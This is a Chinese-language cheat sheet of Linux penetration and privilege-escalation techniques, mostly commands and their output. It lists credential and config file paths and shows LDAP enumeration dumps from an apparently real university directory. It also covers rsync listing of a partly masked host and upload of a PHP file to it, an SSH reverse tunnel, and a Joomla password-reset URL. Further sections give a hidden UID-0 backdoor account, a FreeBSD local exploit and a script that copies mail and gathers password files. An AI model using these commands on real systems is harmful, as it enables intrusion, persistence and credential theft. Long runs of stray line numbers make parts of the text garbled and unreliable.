Linux渗透与提权：技巧总结篇

本文为Linux渗透与提权技巧总结篇，旨在收集各种Linux渗透技巧与提权版本，方便各位同学在日后的渗透测试中能够事半功倍。

Linux 系统下的一些常见路径：

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

229

230

231

232

233

234

235

236

237

238

239

240

241

242

243

244

245

246

247

248

249

250

251

252

253

254

255

256

257

258

259

260

261

262

263

264

265

266

267

268

269

270

271

272

273

274

275

276

277

278

279

280

281

282

283

284

285

286

287

288

289

290

291

292

293

/etc/passwd

/etc/shadow

/etc/fstab

/etc/host.conf

/etc/motd

/etc/ld.so.conf

/var/www/htdocs/index.php

/var/www/conf/httpd.conf

/var/www/htdocs/index.html

/var/httpd/conf/php.ini

/var/httpd/htdocs/index.php

/var/httpd/conf/httpd.conf

/var/httpd/htdocs/index.html

/var/httpd/conf/php.ini

/var/www/index.html

/var/www/index.php

/opt/www/conf/httpd.conf

/opt/www/htdocs/index.php

/opt/www/htdocs/index.html

/usr/local/apache/htdocs/index.html

/usr/local/apache/htdocs/index.php

/usr/local/apache2/htdocs/index.html

/usr/local/apache2/htdocs/index.php

/usr/local/httpd2.2/htdocs/index.php

/usr/local/httpd2.2/htdocs/index.html

/tmp/apache/htdocs/index.html

/tmp/apache/htdocs/index.php

/etc/httpd/htdocs/index.php

/etc/httpd/conf/httpd.conf

/etc/httpd/htdocs/index.html

/www/php/php.ini

/www/php4/php.ini

/www/php5/php.ini

/www/conf/httpd.conf

/www/htdocs/index.php

/www/htdocs/index.html

/usr/local/httpd/conf/httpd.conf

/apache/apache/conf/httpd.conf

/apache/apache2/conf/httpd.conf

/etc/apache/apache.conf

/etc/apache2/apache.conf

/etc/apache/httpd.conf

/etc/apache2/httpd.conf

/etc/apache2/vhosts.d/00_default_vhost.conf

/etc/apache2/sites-available/default

/etc/phpmyadmin/config.inc.php

/etc/mysql/my.cnf

/etc/httpd/conf.d/php.conf

/etc/httpd/conf.d/httpd.conf

/etc/httpd/logs/error_log

/etc/httpd/logs/error.log

/etc/httpd/logs/access_log

/etc/httpd/logs/access.log

/home/apache/conf/httpd.conf

/home/apache2/conf/httpd.conf

/var/log/apache/error_log

/var/log/apache/error.log

/var/log/apache/access_log

/var/log/apache/access.log

/var/log/apache2/error_log

/var/log/apache2/error.log

/var/log/apache2/access_log

/var/log/apache2/access.log

/var/www/logs/error_log

/var/www/logs/error.log

/var/www/logs/access_log

/var/www/logs/access.log

/usr/local/apache/logs/error_log

/usr/local/apache/logs/error.log

/usr/local/apache/logs/access_log

/usr/local/apache/logs/access.log

/var/log/error_log

/var/log/error.log

/var/log/access_log

/var/log/access.log

/usr/local/apache/logs/access_logaccess_log.old

/usr/local/apache/logs/error_logerror_log.old

/etc/php.ini

/bin/php.ini

/etc/init.d/httpd

/etc/init.d/mysql

/etc/httpd/php.ini

/usr/lib/php.ini

/usr/lib/php/php.ini

/usr/local/etc/php.ini

/usr/local/lib/php.ini

/usr/local/php/lib/php.ini

/usr/local/php4/lib/php.ini

/usr/local/php4/php.ini

/usr/local/php4/lib/php.ini

/usr/local/php5/lib/php.ini

/usr/local/php5/etc/php.ini

/usr/local/php5/php5.ini

/usr/local/apache/conf/php.ini

/usr/local/apache/conf/httpd.conf

/usr/local/apache2/conf/httpd.conf

/usr/local/apache2/conf/php.ini

/etc/php4.4/fcgi/php.ini

/etc/php4/apache/php.ini

/etc/php4/apache2/php.ini

/etc/php5/apache/php.ini

/etc/php5/apache2/php.ini

/etc/php/php.ini

/etc/php/php4/php.ini

/etc/php/apache/php.ini

/etc/php/apache2/php.ini

/web/conf/php.ini

/usr/local/Zend/etc/php.ini

/opt/xampp/etc/php.ini

/var/local/www/conf/php.ini

/var/local/www/conf/httpd.conf

/etc/php/cgi/php.ini

/etc/php4/cgi/php.ini

/etc/php5/cgi/php.ini

/php5/php.ini

/php4/php.ini

/php/php.ini

/PHP/php.ini

/apache/php/php.ini

/xampp/apache/bin/php.ini

/xampp/apache/conf/httpd.conf

/NetServer/bin/stable/apache/php.ini

/home2/bin/stable/apache/php.ini

/home/bin/stable/apache/php.ini

/var/log/mysql/mysql-bin.log

/var/log/mysql.log

/var/log/mysqlderror.log

/var/log/mysql/mysql.log

/var/log/mysql/mysql-slow.log

/var/mysql.log

/var/lib/mysql/my.cnf

/usr/local/mysql/my.cnf

/usr/local/mysql/bin/mysql

/etc/mysql/my.cnf

/etc/my.cnf

/usr/local/cpanel/logs

/usr/local/cpanel/logs/stats_log

/usr/local/cpanel/logs/access_log

/usr/local/cpanel/logs/error_log

/usr/local/cpanel/logs/license_log

/usr/local/cpanel/logs/login_log

/usr/local/cpanel/logs/stats_log

/usr/local/share/examples/php4/php.ini

/usr/local/share/examples/php/php.ini

/usr/local/tomcat5527/bin/version.sh

/usr/share/tomcat6/bin/startup.sh

/usr/tomcat6/bin/startup.sh

liunx 相关提权渗透技巧总结，一、ldap 渗透技巧：

1	1.cat /etc/nsswitch

看看密码登录策略我们可以看到使用了file ldap模式

2.less /etc/ldap.conf

base ou=People,dc=unix-center,dc=net

找到ou,dc,dc设置

3.查找管理员信息

匿名方式

1	ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

有密码形式

1	ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

4.查找10条用户记录

1	ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口

实战:

1	1.cat /etc/nsswitch

看看密码登录策略我们可以看到使用了file ldap模式

2.less /etc/ldap.conf

base ou=People,dc=unix-center,dc=net

找到ou,dc,dc设置

3.查找管理员信息

匿名方式

1	ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

有密码形式

1	ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

4.查找10条用户记录

1	ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口

渗透实战:

1.返回所有的属性

ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s sub "objectclass=*"

version: 1

dn: dc=ruc,dc=edu,dc=cn

dc: ruc

objectClass: domain

dn: uid=manager,dc=ruc,dc=edu,dc=cn

uid: manager

objectClass: inetOrgPerson

objectClass: organizationalPerson

objectClass: person

objectClass: top

sn: manager

cn: manager

dn: uid=superadmin,dc=ruc,dc=edu,dc=cn

uid: superadmin

objectClass: inetOrgPerson

objectClass: organizationalPerson

objectClass: person

objectClass: top

sn: superadmin

cn: superadmin

dn: uid=admin,dc=ruc,dc=edu,dc=cn

uid: admin

objectClass: inetOrgPerson

objectClass: organizationalPerson

objectClass: person

objectClass: top

sn: admin

cn: admin

dn: uid=dcp_anonymous,dc=ruc,dc=edu,dc=cn

uid: dcp_anonymous

objectClass: top

objectClass: person

objectClass: organizationalPerson

objectClass: inetOrgPerson

sn: dcp_anonymous

cn: dcp_anonymous

2.查看基类

1	bash-3.00# ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s base "objectclass=*" \| more version: 1 dn: dc=ruc,dc=edu,dc=cn dc: ruc objectClass: domain

3.查找

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

bash-3.00# ldapsearch -h 192.168.7.33 -b "" -s base "objectclass=*"

version: 1

dn:

objectClass: top

namingContexts: dc=ruc,dc=edu,dc=cn

supportedExtension: 2.16.840.1.113730.3.5.7

supportedExtension: 2.16.840.1.113730.3.5.8

supportedExtension: 1.3.6.1.4.1.4203.1.11.1

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.25

supportedExtension: 2.16.840.1.113730.3.5.3

supportedExtension: 2.16.840.1.113730.3.5.5

supportedExtension: 2.16.840.1.113730.3.5.6

supportedExtension: 2.16.840.1.113730.3.5.4

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.1

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.2

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.3

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.4

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.5

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.6

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.7

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.8

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.9

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.23

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.11

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.12

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.13

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.14

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.15

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.16

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.17

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.18

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.19

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.21

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.22

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.24

supportedExtension: 1.3.6.1.4.1.1466.20037

supportedExtension: 1.3.6.1.4.1.4203.1.11.3

supportedControl: 2.16.840.1.113730.3.4.2

supportedControl: 2.16.840.1.113730.3.4.3

supportedControl: 2.16.840.1.113730.3.4.4

supportedControl: 2.16.840.1.113730.3.4.5

supportedControl: 1.2.840.113556.1.4.473

supportedControl: 2.16.840.1.113730.3.4.9

supportedControl: 2.16.840.1.113730.3.4.16

supportedControl: 2.16.840.1.113730.3.4.15

supportedControl: 2.16.840.1.113730.3.4.17

supportedControl: 2.16.840.1.113730.3.4.19

supportedControl: 1.3.6.1.4.1.42.2.27.9.5.2

supportedControl: 1.3.6.1.4.1.42.2.27.9.5.6

supportedControl: 1.3.6.1.4.1.42.2.27.9.5.8

supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1

supportedControl: 2.16.840.1.113730.3.4.14

supportedControl: 1.3.6.1.4.1.1466.29539.12

supportedControl: 2.16.840.1.113730.3.4.12

supportedControl: 2.16.840.1.113730.3.4.18

supportedControl: 2.16.840.1.113730.3.4.13

supportedSASLMechanisms: EXTERNAL

supportedSASLMechanisms: DIGEST-MD5

supportedLDAPVersion: 2

supportedLDAPVersion: 3

vendorName: Sun Microsystems, Inc.

vendorVersion: Sun-Java(tm)-System-Directory/6.2

dataversion: 020090516011411

netscapemdsuffix: cn=ldap://dc=webA:389

supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA

supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA

supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_256_CBC_SHA

supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_256_CBC_SHA

supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_256_CBC_SHA

supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA

supportedSSLCiphers: TLS_RSA_WITH_AES_256_CBC_SHA

supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_RC4_128_SHA

supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA

supportedSSLCiphers: TLS_ECDHE_RSA_WITH_RC4_128_SHA

supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA

supportedSSLCiphers: TLS_DHE_DSS_WITH_RC4_128_SHA

supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_128_CBC_SHA

supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_128_CBC_SHA

supportedSSLCiphers: TLS_ECDH_RSA_WITH_RC4_128_SHA

supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_128_CBC_SHA

supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_RC4_128_SHA

supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA

supportedSSLCiphers: SSL_RSA_WITH_RC4_128_MD5

supportedSSLCiphers: SSL_RSA_WITH_RC4_128_SHA

supportedSSLCiphers: TLS_RSA_WITH_AES_128_CBC_SHA

supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA

supportedSSLCiphers: TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA

supportedSSLCiphers: SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA

supportedSSLCiphers: SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA

supportedSSLCiphers: TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA

supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA

supportedSSLCiphers: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA

supportedSSLCiphers: SSL_RSA_WITH_3DES_EDE_CBC_SHA

supportedSSLCiphers: SSL_DHE_RSA_WITH_DES_CBC_SHA

supportedSSLCiphers: SSL_DHE_DSS_WITH_DES_CBC_SHA

supportedSSLCiphers: SSL_RSA_FIPS_WITH_DES_CBC_SHA

supportedSSLCiphers: SSL_RSA_WITH_DES_CBC_SHA

supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_RC4_56_SHA

supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA

supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC4_40_MD5

supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC2_CBC_40_MD5

supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_NULL_SHA

supportedSSLCiphers: TLS_ECDHE_RSA_WITH_NULL_SHA

supportedSSLCiphers: TLS_ECDH_RSA_WITH_NULL_SHA

supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_NULL_SHA

supportedSSLCiphers: SSL_RSA_WITH_NULL_SHA

supportedSSLCiphers: SSL_RSA_WITH_NULL_MD5

supportedSSLCiphers: SSL_CK_RC4_128_WITH_MD5

supportedSSLCiphers: SSL_CK_RC2_128_CBC_WITH_MD5

supportedSSLCiphers: SSL_CK_DES_192_EDE3_CBC_WITH_MD5

supportedSSLCiphers: SSL_CK_DES_64_CBC_WITH_MD5

supportedSSLCiphers: SSL_CK_RC4_128_EXPORT40_WITH_MD5

supportedSSLCiphers: SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5

1	<strong> </strong>

liunx 相关提权渗透技巧总结，二、NFS 渗透技巧：

列举IP：

1	showmount -e ip

liunx 相关提权渗透技巧总结，三、rsync渗透技巧：

1.查看rsync服务器上的列表：

rsync 210.51.X.X::

finance

img_finance

auto

img_auto

html_cms

img_cms

ent_cms

ent_img

ceshi

res_img

res_img_c2

chip

chip_c2

ent_icms

games

gamesimg

media

mediaimg

fashion

res-fashion

res-fo

taobao-home

res-taobao-home

house

res-house

res-home

res-edu

res-ent

res-labs

res-news

res-phtv

res-media

home

edu

news

res-book

看相应的下级目录(注意一定要在目录后面添加上/)

rsync 210.51.X.X::htdocs_app/

rsync 210.51.X.X::auto/

rsync 210.51.X.X::edu/

2.下载rsync服务器上的配置文件

1	rsync -avz 210.51.X.X::htdocs_app/ /tmp/app/

3.向上更新rsync文件(成功上传,不会覆盖)

rsync -avz nothack.php 210.51.X.X::htdocs_app/warn/

http://app.finance.xxx.com/warn/nothack.txt

liunx 相关提权渗透技巧总结，四、squid渗透技巧：

nc -vv 91ri.org 80

GET HTTP://www.sina.com / HTTP/1.0

GET HTTP://WWW.sina.com:22 / HTTP/1.0

liunx 相关提权渗透技巧总结，五、SSH端口转发：

1	ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip

liunx 相关提权渗透技巧总结，六、joomla渗透小技巧：

确定版本：

1	index.php?option=com_content&view=article&id=30:what-languages-are-supported-by-joomla-15&catid=32:languages&Itemid=47

重新设置密码：

1	index.php?option=com_user&view=reset&layout=confirm

liunx 相关提权渗透技巧总结，七、Linux添加UID为0的root用户：

1	useradd -o -u 0 nothack

liunx 相关提权渗透技巧总结，八、freebsd本地提权：

[argp@julius ~]$ uname -rsi

* freebsd 7.3-RELEASE GENERIC

* [argp@julius ~]$ sysctl vfs.usermount

* vfs.usermount: 1

* [argp@julius ~]$ id

* uid=1001(argp) gid=1001(argp) groups=1001(argp)

* [argp@julius ~]$ gcc -Wall nfs_mount_ex.c -o nfs_mount_ex

* [argp@julius ~]$ ./nfs_mount_ex

calling nmount()

tar 文件夹打包：

1、tar打包：

tar -cvf /home/public_html/*.tar /home/public_html/--exclude=排除文件*.gif 排除目录 /xx/xx/*

alzip打包(韩国) alzip -a D:WEB d:web*.rar

{

注：

关于tar的打包方式,linux不以扩展名来决定文件类型。

若压缩的话tar -ztf *.tar.gz 查看压缩包里内容 tar -zxf *.tar.gz 解压

那么用这条比较好

1	tar -czf /home/public_html/.tar.gz /home/public_html/--exclude= 排除文件.gif 排除目录 /xx/xx/*

}

系统信息收集：

for linux：

#!/bin/bash

echo #######geting sysinfo####

echo ######usage: ./getinfo.sh >/tmp/sysinfo.txt

echo #######basic infomation##

cat /proc/meminfo

echo

cat /proc/cpuinfo

echo

rpm -qa 2>/dev/null

######stole the mail......######

cp -a /var/mail /tmp/getmail 2>/dev/null

echo 'u'r id is' `id`

echo ###atq&crontab#####

atq

crontab -l

echo #####about var#####

set

echo #####about network###

####this is then point in pentest,but i am a new bird,so u need to add some in it

cat /etc/hosts

hostname

ipconfig -a

arp -v

echo ########user####

cat /etc/passwd|grep -i sh

echo ######service####

chkconfig --list

for i in {oracle,mysql,tomcat,samba,apache,ftp}

cat /etc/passwd|grep -i $i

done

locate passwd >/tmp/password 2>/dev/null

sleep 5

locate password >>/tmp/password 2>/dev/null

sleep 5

locate conf >/tmp/sysconfig 2>dev/null

sleep 5

locate config >>/tmp/sysconfig 2>/dev/null

sleep 5

###maybe can use "tree /"###

echo ##packing up#########

tar cvf getsysinfo.tar /tmp/getmail /tmp/password /tmp/sysconfig

rm -rf /tmp/getmail /tmp/password /tmp/sysconfig

the object is not found